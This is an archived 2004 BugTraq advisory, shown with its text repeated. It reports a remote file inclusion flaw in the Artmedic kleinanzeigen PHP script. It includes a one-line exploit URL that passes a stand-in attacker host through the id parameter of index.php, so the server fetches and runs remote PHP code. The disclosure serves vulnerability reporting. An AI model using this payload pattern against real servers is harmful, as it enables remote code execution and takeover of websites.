BugTraq
Back to list
|
Post reply
Artmedic kleinanzeigen include vulnerability
Jul 19 2004 02:25AM
Francisco Alisson (dominusvis click21 com br)
Artmedic kleinanzeigen allow code inclusion in index.php.
Exploit:
www.host.com/artmedic-kleinanzeigen-path/index.php?id=http://evil-host.c
om
An evil attacker could be use this vulnerability to execute
php code with the same user id of the running server.
Thanks and sorry for the bad english
Dominus_Vis from Infektion Group :>
irc.phey.net -j #infektion
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
Artmedic kleinanzeigen allow code inclusion in index.php.
Exploit:
www.host.com/artmedic-kleinanzeigen-path/index.php?id=http://evil-host.c
om
An evil attacker could be use this vulnerability to execute
php code with the same user id of the running server.
Thanks and sorry for the bad english
Dominus_Vis from Infektion Group :>
irc.phey.net -j #infektion
[ reply ]